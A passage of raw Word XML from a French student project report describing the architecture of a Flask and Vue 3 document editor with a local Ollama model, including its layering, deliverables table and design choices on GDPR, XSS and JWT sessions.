            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Livrés</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>(§ 9, § 10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Jeu de tests automatisés</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Oui</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Livré (§ 9)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Rapport d'audit d'accessibilité et de sécurité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Livrés — docs/audit-accessibilite.md, docs/audit-securite.md</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="43"/>
    <w:bookmarkEnd w:id="44"/>
    <w:bookmarkStart w:id="51" w:name="Xfcfc623431ae1b48bdfc8eda4287e7c7da382c0"/>
    <w:p w14:paraId="47DFA747" w14:textId="5EBD2C13" w:rsidR="003A2DEC" w:rsidRPr="00B1648B" w:rsidRDefault="003A2DEC" w:rsidP="003A2DEC">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc198828311"/>
      <w:r w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>L’architecture logicielle du projet</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Vue d'ensemble</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L'application suit une architecture</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">client/serveur découplée en trois niveaux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, avec un service d'inférence local en périphérie :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5688000" cy="2495755"/>
            <wp:docPr id="1" name="Picture 1"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="archi.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5688000" cy="2495755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ImageCaption"/>
      </w:pPr>
      <w:r>
        <w:t>Architecture logicielle — découpage en couches et services périphériques.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le navigateur ne dialogue jamais directement avec le moteur d'inférence : tout appel passe par l'API, qui contrôle l'authentification, la propriété du document, le quota, puis journalise l'interaction. Sans cet intermédiaire, ni le quota ni la traçabilité RGPD ne seraient applicables.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le moteur d'inférence n'écoute que sur l'interface de bouclage (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">localhost</w:t>
      </w:r>
      <w:r>
        <w:t>). Cette règle, initialement implicite, est devenue une consigne explicite de déploiement après la publication de CVE-2026-7482 (§ 11).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="45"/>
    <w:bookmarkStart w:id="46" w:name="X8369aaa8dfc32272386751bf2a6c46ab26ba3d7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Le découpage en couches du backend</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Couche</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Répertoire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Responsabilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ne contient jamais</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Présentation HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">app/routes/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lecture de la requête, validation des entrées, choix du code de retour, sérialisation JSON</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Règle métier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Métier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">app/services/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Hachage et vérification des mots de passe, cycle de vie des jetons, construction des prompts et appel au modèle, envoi des courriels</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Objet</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">request</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, objet</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">response</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, import Flask</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Persistance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">database/db.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Modèles SQLAlchemy, relations, contraintes, requêtes et agrégations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Logique de présentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cette règle — aucun import Flask dans</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">services/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>— est ce qui rend les composants métier testables sans démarrer de serveur. C'est le prérequis du plan de tests unitaires décrit en § 9. Une nuance sur son application réelle — l'usage de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">current_app</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>pour lire la configuration — est apportée en § 7.2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cinq blueprints structurent l'API :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">auth_routes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(inscription, connexion, rafraîchissement, déconnexion, réinitialisation de mot de passe),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">document_route</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dossier_route</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ia_route</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(génération et historique) et</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">admin_route</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(back-office, réservé au rôle</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="46"/>
    <w:bookmarkStart w:id="47" w:name="X84d1ff8a3d2d70eb86f29d30da5b73982faa3b4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>L'organisation du frontend</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Répertoire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Rôle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">views/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Une vue par route ; le routeur applique trois gardes :</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">auth</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">guest</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">components/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Composants réutilisables :</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">MarkdownEditor</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Nav</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Footer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">services/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Un client HTTP par domaine métier (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">authService</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">documentService</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">dossierService</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">iaService</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">adminService</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">) au-dessus d'un</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">api.ts</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">commun qui porte l'intercepteur de rafraîchissement du jeton</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">stores/auth.ts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">État d'authentification centralisé (Pinia)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">types/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Types TypeScript partagés entre le front et les réponses de l'API</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aucune vue n'appelle</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">axios</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">directement : tout passe par la couche</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">services/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. L'intercepteur qui rejoue une requête après un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">401</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en rafraîchissant l'access token est donc écrit une fois, à un seul endroit.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="47"/>
    <w:bookmarkStart w:id="48" w:name="X728a92d6fcac753b5d32a988afcfdeeff030ef9"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Les choix techniques structurants</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Vue 3 plutôt que React.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Le cahier des charges recommande React sans l'imposer. Vue 3 avec la Composition API et TypeScript offre le même modèle de composants ; sa maîtrise plus avancée de ma part a réduit le risque sur un projet mené seule, et l'intégration de CodeMirror 6 y est directe. Le découpage vues / composants / services / store reste transposable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Ollama en local plutôt que l'API OpenAI. Le cahier des charges autorise explicitement les deux. L'exigence RGPD — aucune donnée personnelle transmise à OpenAI sans anonymisation — est difficile à garantir sur des textes rédigés librement par l'utilisateur, où l'anonymisation ne peut jamais être exhaustive. En hébergeant le modèle qwen2.5:3b localement, les contenus ne quittent pas l'infrastructure : l'exigence est satisfaite par construction plutôt que par filtrage. Aucune clé d'API n'est nécessaire, donc aucun secret de facturation à protéger. Contreparties assumées : latence plus élevée, qualité de sortie inférieure à GPT-4, prérequis d'installation d'Ollama, et maintenance d'un service supplémentaire — la veille a confirmé que ce dernier point n'est pas théorique (§ 11). La couche ia_service isole l'appel au modèle, ce qui permettrait de basculer vers un fournisseur distant sans toucher aux routes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Markdown plutôt que WYSIWYG.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Le cahier des charges laisse le choix. Le Markdown est stocké tel quel, sans HTML intermédiaire : la surface d'attaque XSS est réduite, les échanges avec le modèle portent sur du texte brut, et les différences avant/après restent lisibles dans l'historique IA. Ce choix constitue aussi une protection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">indépendante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>de la bibliothèque d'assainissement — argument qui a pris du poids quand la veille a révélé une vulnérabilité dans DOMPurify elle-même (§ 11).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SQLite en développement, MySQL en cible.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SQLAlchemy 2 permet de travailler sur SQLite en local et de viser MySQL en production sans réécrire la couche d'accès aux données.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">JWT court + refresh token en cookie.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">L'access token, de courte durée (15 minutes), est transmis en en-tête</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">et n'est jamais stocké en base. Le refresh token vit dans un cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">httpOnly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">limité au chemin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/auth</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, inaccessible au JavaScript, et son empreinte est enregistrée côté serveur dans</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">user_session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— c'est ce qui rend la révocation possible avant expiration.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="48"/>
